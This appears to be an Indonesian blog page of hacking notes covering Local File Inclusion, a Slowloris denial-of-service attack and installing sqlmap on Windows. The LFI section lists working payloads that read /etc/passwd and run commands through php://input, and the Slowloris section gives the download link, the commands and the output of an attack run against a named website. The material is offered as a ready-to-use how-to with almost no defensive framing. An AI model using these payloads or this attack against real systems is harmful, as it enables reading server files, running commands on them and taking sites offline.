Note For Local File Inclusion Web Penetration Testing

Local File Inclusion atau yang sering kita kenal dengan singkatan LFI merupakan sebuah celah pada sebuah website yang mana attacker/hacker dapat melakukan inject pada website tersebut melalui url.

  • PHP file:// Wrapper
    Payload ini mengirimkan post request ke server.

    Contoh : php://input&cmd=ls
  • PHP php://filter
    Perhatikan penggunaan payload berikut:

    php://filter/resource=/etc/passwd

    Dengan payload ini maka file /etc/passwd akan ditampilkan pada browser.

  • Null byte injection
    =/etc/passwd%2500
    =/etc/passwd%00

DoS Attack With Slowloris

  1. Download slowloris
    https://github.com/llaera/slowloris.pl
  2. Cara menggunakannya:
[email protected]:~/Desktop/exploit# chmod +x slowloris.pl
[email protected]:~/Desktop/exploit# ./slowloris.pl -dns manadohacker.org
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris
Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Defaulting to a 100 second re-try timeout.
Defaulting to 1000 connections.
Multithreading enabled.
Connecting to manadohacker.org:80 every 100 seconds with 1000 sockets:
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.

 

Install Sqlmap di Windows 10

  1. Download Sqlmap
    https://github.com/sqlmapproject/sqlmap/zipball/master
  2. Download Python untuk windows
    https://www.python.org/downloads/release/python-2712/
  3. Install python 2.7
    – Jalankan installer python dan klik Next

    – Setelah itu akan muncul tampilan seperti pada gambar berikut ini, pada step ini silahkan klik Next aja

    – Kemudian akan muncul lagi window seperti ini
    Namun jika anda ingin menambahkan atau mengurangi fitur yang akan di-install silahkan pilih pada step ini
    Klik Next saja tanpa merubah apa-apa

    –  Selanjutnya akan muncul tampilan seperti berikut

    Tunggu saja sampai proses instalasi selesai dan klik Finish

    – Sampai pada tahap ini instalasi python sudah selesai, namun untuk dapat menggunakan python pada CMD, anda harus memasukan python PATH Environment windows, caranya silahkan buka CMD dengan level Administrator dan jalankan perintah berikut:

    setx path “%path%;C:\Python27;”

    Sekarangan anda sudah bisa menggunakan SQLMAP, silahkan extract Sqlmap yang telah di-download, kemudian masuk pada direktori Sqlmap dan ketikan perintah berikut:

    python sqlmap.py